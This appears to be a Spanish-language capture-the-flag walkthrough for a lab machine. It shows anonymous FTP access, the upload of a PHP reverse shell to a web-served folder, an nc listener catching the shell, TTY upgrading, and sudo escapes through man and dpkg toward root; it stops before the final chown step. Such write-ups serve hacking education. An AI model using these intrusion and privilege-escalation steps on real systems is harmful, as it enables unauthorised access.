Vemos que hay una carpeta de upload/ bastante interesante y el FTP vamos a probar si se puede entrar como anonymous.
FTP
ftp anonymous@<IP>
Y veremos que si nos deja, si listamos vemos lo siguiente:
ls
Info:
229 Entering Extended Passive Mode (|||23034|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7816 Nov 25 2019 about.html
-rw-r--r-- 1 0 0 8102 Nov 25 2019 contact.html
drwxr-xr-x 2 0 0 4096 Jan 01 1970 css
drwxr-xr-x 2 0 0 4096 Apr 28 2024 heustonn-html
drwxr-xr-x 2 0 0 4096 Oct 23 2019 images
-rw-r--r-- 1 0 0 20162 Apr 28 2024 index.html
drwxr-xr-x 2 0 0 4096 Oct 23 2019 js
-rw-r--r-- 1 0 0 9808 Nov 25 2019 service.html
drwxrwxrwx 1 33 33 4096 Apr 28 2024 upload
226 Directory send OK.
Vemos que el ftp esta dentro de la pagina, por lo que podremos probar a subir un .php desde el ftp para crearnos una reverse shell de la siguiente forma:
Una vez creado el archivo lo subiremos desde ftp de la siguiente forma:
cd upload/
put shell.php
Info:
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||21819|)
150 Ok to send data.
100% |****************************************************************************************************************| 116 1.15 MiB/s 00:00 ETA
226 Transfer complete.
116 bytes sent in 00:00 (261.61 KiB/s)
Ahora si nos vamos a la pagina en la seccion de upload
URL = http://<IP>/upload/
Veremos el archivo de shell.php, por lo que nos pondremos antes a la escucha:
nc -lvnp <PORT>
Y si pinchamos el archivo de la web y volvemos a la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.120.128] from (UNKNOWN) [172.17.0.2] 51042
whoami
www-data
Sanitización de shell (TTY)
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Escalate user pingu
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for www-data on 71405f43252f:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User www-data may run the following commands on 71405f43252f:
(pingu) NOPASSWD: /usr/bin/man
Vemos que podemos ejecutar el binario man como el usuario pingu, por lo que haremos lo siguiente:
sudo -u pingu man man
!/bin/bash
Y con esto seremos el usuario pingu.
Escalate user gladys
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for pingu on 71405f43252f:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User pingu may run the following commands on 71405f43252f:
(gladys) NOPASSWD: /usr/bin/nmap
(gladys) NOPASSWD: /usr/bin/dpkg
Vemos que podemos ejecutar los binarios nmap y dpkg como el usuario gladys por lo que haremos lo siguiente:
sudo -u gladys dpkg -l
!/bin/bash
Y con esto veremos que somos dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for gladys on 71405f43252f:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User gladys may run the following commands on 71405f43252f:
(root) NOPASSWD: /usr/bin/chown
Veremos que podemos ejecutar el binario chown como el usuario root, por lo que haremos lo siguiente: